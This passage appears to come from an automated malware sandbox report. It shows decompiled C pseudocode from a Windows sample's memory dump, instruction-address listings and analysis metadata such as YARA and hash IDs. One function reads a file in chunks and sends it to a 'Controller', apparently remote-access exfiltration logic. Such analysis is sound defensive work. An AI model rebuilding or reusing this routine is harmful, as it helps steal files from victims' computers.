																										_v16 = _t95;
																										 *(_t221 + _t290) = L0043DFD9(_t262, _t95, 1);
																										L0043EE85(0);
																										_t323 = _t323 + 0xc;
																										__eflags =  *(_t221 + _t290);
																										if( *(_t221 + _t290) == 0) {
																											goto L102;
																										} else {
																											_t180 = E004405A6( *(_t221 + _t290), _v16,  *_t290);
																											_t323 = _t323 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E0043629A();
																												asm("int3");
																												_push(_t317);
																												_t318 = _t323;
																												_push(_t262);
																												_push(_t262);
																												_push(_t290);
																												_t291 = _v128;
																												__eflags = _t291;
																												if(_t291 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t291;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t305);
																													__eflags =  *_t291;
																													if( *_t291 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t306 = L0043DFD9(_t263, _t104, 4);
																													__eflags = _t306;
																													if(_t306 == 0) {
																														L119:
																														E0043E5DA(_t223, _t284, _t291, _t306);
																														goto L120;
																													} else {
																														__eflags =  *_t291 - _t223;
																														if( *_t291 == _t223) {
																															L117:
																															L0043EE85(_t223);
																															_t167 = _t306;
																															goto L118;
																														} else {
																															_t223 = _t306 - _t291;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t291;
																																_t105 = _t267 + 2; // 0x6
																																_t284 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t291) = L0043DFD9(_t267 - _t284 >> 1, _t107, 2);
																																L0043EE85(0);
																																_t323 = _t323 + 0xc;
																																__eflags =  *(_t223 + _t291);
																																if( *(_t223 + _t291) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E00440264( *(_t223 + _t291), _v24,  *_t291);
																																	_t323 = _t323 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E0043629A();
																																		asm("int3");
																																		_push(_t318);
																																		_push(_t223);
																																		_push(_t306);
																																		_push(_t291);
																																		_t292 =  *0x46b4d0; // 0x3179e90
																																		_t307 = _t292;
																																		__eflags =  *_t292;
																																		if( *_t292 == 0) {
																																			L127:
																																			_t308 = _t307 - _t292;
																																			__eflags = _t308;
																																			_t310 =  ~(_t308 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E00443141(_v12,  *_t307, _t225);
																																				_t323 = _t323 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t310 = _t307 - _t292 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t307 =  &(_t307[1]);
																																				__eflags =  *_t307;
																																			} while ( *_t307 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t310;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t291 = _t291 + 4;
																																__eflags =  *_t291 - _t173;
																															} while ( *_t291 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t290 = _t290 + 4;
																										__eflags =  *_t290 - _t180;
																									} while ( *_t290 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t304[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = L00439E14();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x46b4d0; // 0x3179e90
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x46b4d4 = L0043DFD9(_t246, 1, 4);
																				L0043EE85(_t221);
																				_t322 = _t322 + 0xc;
																				goto L63;
																			} else {
																				 *0x46b4d0 = L0043DFD9(_t246, 1, 4);
																				L0043EE85(_t221);
																				_t322 = _t322 + 0xc;
																				__eflags =  *0x46b4d0 - _t221; // 0x3179e90
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t302 =  *0x46b4d4; // 0x0
																					__eflags = _t302;
																					if(_t302 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L0043C07A(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t302 =  *0x46b4d4; // 0x0
																				__eflags = _t302;
																				if(_t302 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					L0043EE85(_t288);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = L00439E14();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t300 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = L00439E14();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x46b4d0 = L0043DFD9(_t231, 1, 4);
										L0043EE85(_t218);
										_t298 =  *0x46b4d0; // 0x3179e90
										_t320 = _t320 + 0xc;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L11;
										} else {
											__eflags =  *0x46b4d4 - _t218; // 0x0
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x46b4d4 = L0043DFD9(_t231, 1, 4);
												L0043EE85(_t218);
												_t320 = _t320 + 0xc;
												__eflags =  *0x46b4d4 - _t218; // 0x0
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x46b4d4 - _t218; // 0x0
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L0043C075(0);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t298 =  *0x46b4d0; // 0x3179e90
											L20:
											__eflags = _t298;
											if(_t298 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												L0043EE85(_t286);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = L00439E14();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}








































































































                              0x00446266
                              0x0044626b
                              0x00446282
                              0x00446284
                              0x00446289
                              0x0044628d
                              0x0044628e
                              0x00446290
                              0x004462e0
                              0x004462e5
                              0x00000000
                              0x00446292
                              0x00446292
                              0x00446294
                              0x00000000
                              0x00446296
                              0x00446296
                              0x0044629a
                              0x004462a0
                              0x004462a3
                              0x004462a6
                              0x004462ac
                              0x004462af
                              0x004462b4
                              0x004462b6
                              0x004462b9
                              0x004462ba
                              0x004462ba
                              0x004462c0
                              0x004462c2
                              0x004462c4
                              0x00446358
                              0x0044635b
                              0x0044635d
                              0x0044635f
                              0x00446360
                              0x00446361
                              0x00446366
                              0x0044636b
                              0x0044636d
                              0x004463b7
                              0x004463b7
                              0x004463ba
                              0x00000000
                              0x004463c0
                              0x004463c0
                              0x004463c2
                              0x004463c5
                              0x004463c5
                              0x004463c8
                              0x004463ca
                              0x00000000
                              0x004463d0
                              0x004463d0
                              0x004463d6
                              0x00000000
                              0x004463dc
                              0x004463dc
                              0x004463de
                              0x004463e6
                              0x004463e8
                              0x004463ed
                              0x004463f0
                              0x004463f2
                              0x00000000
                              0x004463f8
                              0x004463f8
                              0x004463fb
                              0x004463fd
                              0x00446400
                              0x00446403
                              0x00000000
                              0x00446403
                              0x004463f2
                              0x004463d6
                              0x004463ca
                              0x0044636f
                              0x0044636f
                              0x00446371
                              0x00000000
                              0x00446373
                              0x00446376
                              0x0044637c
                              0x0044637f
                              0x00446382
                              0x00446396
                              0x00446396
                              0x00446399
                              0x00000000
                              0x00000000
                              0x00446392
                              0x00446395
                              0x00446395
                              0x00446395
                              0x0044639b
                              0x0044639d
                              0x004463a5
                              0x004463a7
                              0x004463ac
                              0x004463af
                              0x004463b1
                              0x004463b3
                              0x00446407
                              0x00446407
                              0x00446407
                              0x00446384
                              0x00446384
                              0x00446387
                              0x00446389
                              0x00446389
                              0x0044640d
                              0x00446410
                              0x00000000
                              0x00446416
                              0x00446416
                              0x00446418
                              0x0044641b
                              0x0044641b
                              0x0044641d
                              0x0044641e
                              0x0044641e
                              0x0044642a
                              0x00446432
                              0x00446435
                              0x00446436
                              0x00446438
                              0x00446481
                              0x00446482
                              0x00000000
                              0x0044643a
                              0x00446441
                              0x00446446
                              0x00446449
                              0x0044644b
                              0x0044648d
                              0x0044648e
                              0x0044648f
                              0x00446490
                              0x00446491
                              0x00446492
                              0x00446497
                              0x0044649b
                              0x0044649d
                              0x004464a0
                              0x004464a1
                              0x004464a4
                              0x004464a6
                              0x004464b8
                              0x004464b9
                              0x004464ba
                              0x004464bd
                              0x004464bf
                              0x004464c4
                              0x004464c8
                              0x004464c9
                              0x004464cb
                              0x0044651c
                              0x00446521
                              0x00000000
                              0x004464cd
                              0x004464cd
                              0x004464cf
                              0x00000000
                              0x004464d1
                              0x004464d1
                              0x004464d7
                              0x004464d9
                              0x004464dd
                              0x004464e0
                              0x004464e3
                              0x004464e9
                              0x004464eb
                              0x004464ec
                              0x004464f2
                              0x004464f5
                              0x004464f7
                              0x004464f7
                              0x004464fd
                              0x004464ff
                              0x0044658c
                              0x00446597
                              0x0044659a
                              0x0044659f
                              0x004465a4
                              0x004465a6
                              0x004465f0
                              0x004465f0
                              0x004465f3
                              0x00000000
                              0x004465f9
                              0x004465f9
                              0x004465fb
                              0x004465fe
                              0x004465fe
                              0x00446601
                              0x00446603
                              0x00000000
                              0x00446609
                              0x00446609
                              0x0044660f
                              0x00000000
                              0x00446615
                              0x00446615
                              0x00446617
                              0x0044661f
                              0x00446621
                              0x00446626
                              0x00446629
                              0x0044662b
                              0x00000000
                              0x00446631
                              0x00446631
                              0x00446634
                              0x00446636
                              0x00446639
                              0x0044663c
                              0x00000000
                              0x0044663c
                              0x0044662b
                              0x0044660f
                              0x00446603
                              0x004465a8
                              0x004465a8
                              0x004465aa
                              0x00000000
                              0x004465ac
                              0x004465af
                              0x004465b5
                              0x004465b8
                              0x004465bb
                              0x004465cf
                              0x004465cf
                              0x004465d2
                              0x00000000
                              0x00000000
                              0x004465cb
                              0x004465ce
                              0x004465ce
                              0x004465ce
                              0x004465d4
                              0x004465d6
                              0x004465de
                              0x004465e0
                              0x004465e5
                              0x004465e8
                              0x004465ea
                              0x004465ec
                              0x00446640
                              0x00446640
                              0x00446640
                              0x004465bd
                              0x004465bd
                              0x004465c0
                              0x004465c2
                              0x004465c2
                              0x00446646
                              0x00446649
                              0x00000000
                              0x0044664f
                              0x0044664f
                              0x00446651
                              0x00446651
                              0x00446654
                              0x00446654
                              0x00446657
                              0x0044665a
                              0x0044665a
                              0x00446665
                              0x00446669
                              0x00446671
                              0x00446674
                              0x00446675
                              0x00446677
                              0x004466be
                              0x004466bf
                              0x00000000
                              0x00446679
                              0x00446681
                              0x00446686
                              0x00446689
                              0x0044668b
                              0x004466ca
                              0x004466cb
                              0x004466cc
                              0x004466cd
                              0x004466ce
                              0x004466cf
                              0x004466d4
                              0x004466d7
                              0x004466d8
                              0x004466db
                              0x004466dc
                              0x004466df
                              0x004466e1
                              0x004466ea
                              0x004466ec
                              0x004466ee
                              0x004466f0
                              0x004466f2
                              0x004466f2
                              0x004466f5
                              0x004466f6
                              0x004466f6
                              0x004466f2
                              0x004466fc
                              0x00446707
                              0x0044670a
                              0x0044670b
                              0x0044670d
                              0x00446774
                              0x00446774
                              0x00000000
                              0x0044670f
                              0x0044670f
                              0x00446712
                              0x00446764
                              0x00446766
                              0x0044676c
                              0x00000000
                              0x00446714
                              0x00446714
                              0x00446717
                              0x00446717
                              0x00446719
                              0x00446719
                              0x0044671b
                              0x0044671b
                              0x0044671e
                              0x0044671e
                              0x00446720
                              0x00446721
                              0x00446721
                              0x00446725
                              0x00446729
                              0x0044672d
                              0x00446737
                              0x0044673a
                              0x0044673f
                              0x00446742
                              0x00446746
                              0x00000000
                              0x00446748
                              0x00446750
                              0x00446755
                              0x00446758
                              0x0044675a
                              0x00446779
                              0x0044677b
                              0x0044677c
                              0x0044677d
                              0x0044677e
                              0x0044677f
                              0x00446780
                              0x00446785
                              0x00446788
                              0x00446789
                              0x0044678b
                              0x0044678c
                              0x0044678d
                              0x0044678e
                              0x00446791
                              0x00446793
                              0x0044679c
                              0x0044679d
                              0x0044679f
                              0x004467a1
                              0x004467a3
                              0x004467a6
                              0x004467a7
                              0x004467a9
                              0x004467ab
                              0x004467ab
                              0x004467ae
                              0x004467af
                              0x004467af
                              0x004467ab
                              0x004467b3
                              0x004467be
                              0x004467c2
                              0x004467c4
                              0x00446832
                              0x00446832
                              0x00000000
                              0x004467c6
                              0x004467c6
                              0x004467c8
                              0x00446822
                              0x00446823
                              0x00446829
                              0x00000000
                              0x004467ca
                              0x004467cc
                              0x004467cc
                              0x004467ce
                              0x004467ce
                              0x004467d0
                              0x004467d0
                              0x004467d3
                              0x004467d3
                              0x004467d6
                              0x004467d9
                              0x004467d9
                              0x004467e5
                              0x004467e9
                              0x004467f1
                              0x004467f7
                              0x004467fc
                              0x004467ff
                              0x00446803
                              0x00000000
                              0x00446805
                              0x0044680d
                              0x00446812
                              0x00446815
                              0x00446817
                              0x00446837
                              0x00446839
                              0x0044683a
                              0x0044683b
                              0x0044683c
                              0x0044683d
                              0x0044683e
                              0x00446843
                              0x00446846
                              0x00446849
                              0x0044684a
                              0x0044684b
                              0x0044684c
                              0x00446852
                              0x00446854
                              0x00446857
                              0x00446883
                              0x00446883
                              0x00446883
                              0x00446888
                              0x00446859
                              0x00446859
                              0x0044685c
                              0x00446862
                              0x00446867
                              0x0044686a
                              0x0044686c
                              0x00000000
                              0x0044686e
                              0x00446870
                              0x00446873
                              0x00446875
                              0x00446891
                              0x00446893
                              0x00446877
                              0x00446877
                              0x00446879
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00446879
                              0x00446875
                              0x00000000
                              0x0044687b
                              0x0044687b
                              0x0044687e
                              0x0044687e
                              0x00000000
                              0x0044685c
                              0x0044688a
                              0x00446890
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00446817
                              0x00000000
                              0x00446819
                              0x00446819
                              0x0044681c
                              0x0044681c
                              0x00446820
                              0x00446820
                              0x00000000
                              0x00446820
                              0x004467c8
                              0x00446795
                              0x00446795
                              0x0044682d
                              0x00446831
                              0x00446831
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044675a
                              0x00000000
                              0x0044675c
                              0x0044675c
                              0x0044675f
                              0x0044675f
                              0x00000000
                              0x00446763
                              0x00446712
                              0x004466e3
                              0x004466e3
                              0x0044676f
                              0x00446773
                              0x00446773
                              0x0044668d
                              0x00446691
                              0x00446694
                              0x0044669e
                              0x004466a6
                              0x004466ac
                              0x004466ae
                              0x004466b0
                              0x004466b5
                              0x004466b5
                              0x004466b8
                              0x004466b8
                              0x00000000
                              0x004466ae
                              0x0044668b
                              0x00446677
                              0x00446649
                              0x004465aa
                              0x00446505
                              0x00446505
                              0x0044650a
                              0x0044650d
                              0x0044653a
                              0x0044653a
                              0x0044653c
                              0x00000000
                              0x0044653e
                              0x0044653e
                              0x00446540
                              0x0044656b
                              0x00446575
                              0x0044657a
                              0x0044657f
                              0x00000000
                              0x00446542
                              0x0044654c
                              0x00446551
                              0x00446556
                              0x00446559
                              0x0044655f
                              0x00000000
                              0x00446561
                              0x00446561
                              0x00446567
                              0x00446569
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00446569
                              0x0044655f
                              0x00446540
                              0x0044650f
                              0x0044650f
                              0x00446511
                              0x00000000
                              0x00446513
                              0x00446513
                              0x00446518
                              0x0044651a
                              0x00446582
                              0x00446582
                              0x00446588
                              0x0044658a
                              0x00446527
                              0x00446527
                              0x00446527
                              0x0044652a
                              0x0044652b
                              0x00446532
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044651a
                              0x00446511
                              0x0044650d
                              0x004464ff
                              0x004464cf
                              0x004464a8
                              0x004464a8
                              0x004464ad
                              0x004464b3
                              0x00446535
                              0x00446539
                              0x00446539
                              0x0044644d
                              0x00446456
                              0x0044645e
                              0x00446462
                              0x00446469
                              0x0044646f
                              0x00446471
                              0x00446473
                              0x00446478
                              0x00446478
                              0x0044647b
                              0x0044647b
                              0x00000000
                              0x00446471
                              0x0044644b
                              0x00446438
                              0x00446410
                              0x00446371
                              0x004462ca
                              0x004462ca
                              0x004462cd
                              0x004462fe
                              0x004462fe
                              0x00446300
                              0x00446310
                              0x00446315
                              0x0044631a
                              0x00446320
                              0x00446323
                              0x00446325
                              0x00000000
                              0x00446327
                              0x00446327
                              0x0044632d
                              0x00000000
                              0x0044632f
                              0x00446339
                              0x0044633e
                              0x00446343
                              0x00446346
                              0x0044634c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044634c
                              0x0044632d
                              0x00446302
                              0x00446302
                              0x00000000
                              0x00446302
                              0x004462cf
                              0x004462cf
                              0x004462d5
                              0x00000000
                              0x004462d7
                              0x004462d7
                              0x004462dc
                              0x004462de
                              0x0044634e
                              0x0044634e
                              0x00446354
                              0x00446354
                              0x00446356
                              0x004462eb
                              0x004462eb
                              0x004462eb
                              0x004462ee
                              0x004462ef
                              0x004462f6
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004462de
                              0x004462d5
                              0x004462cd
                              0x004462c4
                              0x00446294
                              0x0044626d
                              0x0044626d
                              0x00446272
                              0x00446278
                              0x004462f9
                              0x004462fd
                              0x004462fd
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                              • String ID:
                              • API String ID: 2719235668-0
                              • Opcode ID: e3b7318083cad0de1a16587f14d9e5a514d884cb7a4dc46a17bab935d5e14516
                              • Instruction ID: b3a0fccac4172db87641eb1f9af5537d347888dfd9dcec10cf93ff69a179e89b
                              • Opcode Fuzzy Hash: e3b7318083cad0de1a16587f14d9e5a514d884cb7a4dc46a17bab935d5e14516
                              • Instruction Fuzzy Hash: 17D127719003007BFB20AF75984266B7BA4EF07718F06016FE945D7382EB799901CB9E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00406455, Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 345fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 77%
                              			E00406455(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
				void* _v12;
				union _LARGE_INTEGER _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				struct _OVERLAPPED* _v40;
				union _LARGE_INTEGER* _v44;
				signed int _v48;
				signed int _v52;
				struct %anon52 _v64;
				intOrPtr _v68;
				struct %anon52 _v80;
				union _LARGE_INTEGER _v84;
				intOrPtr _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct %anon52 _t117;
				void* _t119;
				void* _t126;
				long _t136;
				void* _t137;
				signed int _t138;
				struct _OVERLAPPED* _t145;
				signed int _t148;
				void* _t154;
				void* _t156;
				void* _t157;
				void* _t173;
				long _t198;
				signed int _t203;
				void* _t216;
				union _LARGE_INTEGER _t280;
				intOrPtr _t281;
				union _LARGE_INTEGER* _t295;
				void* _t297;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t305;

				_t278 = __edx;
				_v68 = __ecx;
				E00404955(__ecx);
				_t302 = _t301 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t299 = _v68;
				E004049D2(__edx);
				_v28 = 0x186a0;
				_v20 = 0;
				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t310 = _t297 - 0xffffffff;
				if(_t297 != 0xffffffff) {
					_v80.LowPart = 0;
					_v80.HighPart = 0;
					__imp__GetFileSizeEx(_t297,  &_v80);
					_t203 = _v80.HighPart;
					_t117 = _v80;
					_v48 = _t203;
					_v32 = _t203;
					_v52 = _t117;
					_v16.LowPart = _t117;
					E0040425F(0,  &_v112, _a4);
					_t119 = L00416C93( &_v136,  &_v112);
					_t303 = _t302 - 0x18;
					_t280 = "Uploading file to Controller: ";
					E004075C4(0, _t303, _t280, _t297, __eflags, _t119);
					_t304 = _t303 - 0x14;
					E00402064(0, _t304, "[Info]");
					E004165D8(0, _t297);
					_t305 = _t304 + 0x30;
					L00401FA7();
					L00401ED0();
					_v36 = 1;
					_v40 = 0;
					_t126 = E004500F0(_v52, _v48, 0x186a0, 0);
					_t210 = _t280;
					asm("xorps xmm0, xmm0");
					_v88 = _t126 + 1;
					asm("adc ecx, ebx");
					asm("movlpd [ebp-0x3c], xmm0");
					_v84.LowPart = _t280;
					__eflags = _v48;
					if(__eflags < 0) {
						L17:
						CloseHandle(_t297);
						L00404DD5(_t299);
						_t198 = 1;
					} else {
						if(__eflags > 0) {
							L5:
							_v44 = _v64.HighPart.LowPart;
							_v64.HighPart.LowPart = _v64;
							_t136 = 0x186a0;
							goto L6;
							do {
								do {
									L6:
									_t281 = _v32;
									__eflags = _v20 - _t281;
									if(__eflags >= 0) {
										_t210 = _v16.LowPart;
										if(__eflags > 0) {
											L9:
											_t136 = _t210;
											_v20 = _t281;
											_v28 = _t136;
										} else {
											__eflags = _t136 - _t210;
											if(__eflags > 0) {
												goto L9;
											}
										}
									}
									_push(_t136);
									_t137 = L0042EE1E(_t210, _t281, _t299, __eflags);
									_push(0);
									_v12 = _t137;
									_v24 = 0;
									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
									__eflags = _t138;
									if(_t138 == 0) {
										_t306 = _t305 - 0x18;
										_t216 = _t305 - 0x18;
										_push("SetFilePointerEx error");
										goto L23;
									} else {
										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
										__eflags = _t148;
										if(_t148 == 0) {
											_t306 = _t305 - 0x18;
											_t216 = _t305 - 0x18;
											_push("ReadFile error");
											L23:
											E00402064(0, _t216);
											E00402064(0, _t306 - 0x18, "[ERROR]");
											E004165D8(0, _t297);
											L0042EE27(_v12);
											CloseHandle(_t297);
											goto L24;
										} else {
											__eflags = _v24;
											if(__eflags == 0) {
												L0042EE27(_v12);
												CloseHandle(_t297);
												L00404DD5(_t299);
												_t145 = 1;
												goto L25;
											} else {
												E0040425F(0,  &_v112, _a4);
												_t154 = E0040208B(0,  &_v472, _t281, __eflags, _v12, _v24);
												_t305 = _t305 - 0x18;
												_t156 = L00416BB8(0x46c238,  &_v448, _v88, _v84);
												_t157 = L00416BB8(0x46c238,  &_v424, _v36, _v40);
												L00402EFD(_t305, L00402F73(0x46c238,  &_v136, L00402F73(0x46c238,  &_v160, L00402F73(0x46c238,  &_v184, L00402EFD( &_v208, L00402F73(0x46c238,  &_v232, L00402EFD( &_v256, L00402F73(0x46c238,  &_v280, L00402F73(0x46c238,  &_v304, L00402F73(0x46c238,  &_v328, L00402F73(0x46c238,  &_v352, L00402F73(0x46c238,  &_v376, L00416CF4(0x46c238,  &_v400,  &_v112), __eflags, 0x46c238), __eflags,  &_a8), __eflags, 0x46c238), __eflags,  &_a32), __eflags, 0x46c238), _t157), __eflags, 0x46c238), _t156), __eflags, 0x46c238), __eflags,  &_a56), __eflags, 0x46c238), _t154);
												_t299 = _v68;
												_push(0x52);
												_t173 = L00404A6E(0x46c238, _v68, _t171, __eflags);
												__eflags = _t173 - 0xffffffff;
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401ED0();
												__eflags = 0x46c200 | _t173 == 0xffffffff;
												if((0x46c200 | _t173 == 0xffffffff) != 0) {
													L00404DD5(_t299);
													CloseHandle(_t297);
													L0042EE27(_v12);
													_t198 = 0;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L18;
									L14:
									L0042EE27(_v12);
									_t136 = _v28;
									_v16.LowPart = _v16 - _t136;
									_t295 = _v44;
									asm("sbb ecx, [ebp-0x10]");
									_v36 = _v36 + 1;
									_push(0);
									_pop(0);
									asm("adc [ebp-0x24], ebx");
									_t210 = _v64.HighPart.LowPart + _t136;
									_v64.HighPart = _t210;
									asm("adc edx, [ebp-0x10]");
									_v44 = _t295;
									__eflags = _t295 - _v48;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L17;
								} else {
									goto L16;
								}
								goto L18;
								L16:
								__eflags = _t210 - _v52;
							} while (_t210 < _v52);
							goto L17;
						} else {
							__eflags = _v52;
							if(_v52 <= 0) {
								goto L17;
							} else {
								goto L5;
							}
						}
					}
				} else {
					E004020CC(0, _t302 - 0x18, _t278, _t310,  &_a8);
					_push(0x53);
					L00404A6E(0, 0x46c2e8, _t278, _t310);
					L24:
					L00404DD5(_t299);
					_t145 = 0;
					L25:
					_t198 = _t145;
				}
				L18:
				L00401FA7();
				L00401FA7();
				L00401FA7();
				return _t198;
			}






























































                              0x00406455
                              0x00406461
                              0x00406464
                              0x00406469
                              0x00406473
                              0x00406474
                              0x00406475
                              0x00406476
                              0x00406477
                              0x0040647c
                              0x00406483
                              0x0040649d
                              0x004064a6
                              0x004064a8
                              0x004064ab
                              0x004064cf
                              0x004064d4
                              0x004064d7
                              0x004064dd
                              0x004064e0
                              0x004064e6
                              0x004064e9
                              0x004064ef
                              0x004064f2
                              0x004064f5
                              0x00406503
                              0x00406508
                              0x0040650b
                              0x00406513
                              0x00406518
                              0x00406522
                              0x00406527
                              0x0040652c
                              0x00406535
                              0x0040653d
                              0x00406548
                              0x00406553
                              0x00406559
                              0x00406561
                              0x00406563
                              0x00406566
                              0x00406569
                              0x0040656b
                              0x00406570
                              0x00406573
                              0x00406576
                              0x00406817
                              0x00406818
                              0x00406820
                              0x00406825
                              0x0040657c
                              0x0040657c
                              0x00406587
                              0x0040658a
                              0x00406590
                              0x00406593
                              0x00406593
                              0x00406598
                              0x00406598
                              0x00406598
                              0x00406598
                              0x0040659b
                              0x0040659e
                              0x004065a0
                              0x004065a3
                              0x004065a9
                              0x004065a9
                              0x004065ab
                              0x004065ae
                              0x004065a5
                              0x004065a5
                              0x004065a7
                              0x00000000
                              0x00000000
                              0x004065a7
                              0x004065a3
                              0x004065b1
                              0x004065b2
                              0x004065b8
                              0x004065bd
                              0x004065c3
                              0x004065c7
                              0x004065cd
                              0x004065cf
                              0x0040688d
                              0x00406890
                              0x00406892
                              0x00000000
                              0x004065d5
                              0x004065e2
                              0x004065e8
                              0x004065ea
                              0x00406881
                              0x00406884
                              0x00406886
                              0x00406897
                              0x00406897
                              0x004068a6
                              0x004068ab
                              0x004068b3
                              0x004068bc
                              0x00000000
                              0x004065f0
                              0x004065f0
                              0x004065f4
                              0x00406868
                              0x0040686f
                              0x00406877
                              0x0040687e
                              0x00000000
                              0x004065fa
                              0x00406600
                              0x00406611
                              0x00406616
                              0x00406633
                              0x00406648
                              0x00406707
                              0x0040670c
                              0x00406710
                              0x00406714
                              0x00406719
                              0x00406725
                              0x00406730
                              0x0040673b
                              0x00406746
                              0x00406751
                              0x0040675c
                              0x00406767
                              0x00406772
                              0x0040677d
                              0x00406788
                              0x00406793
                              0x0040679e
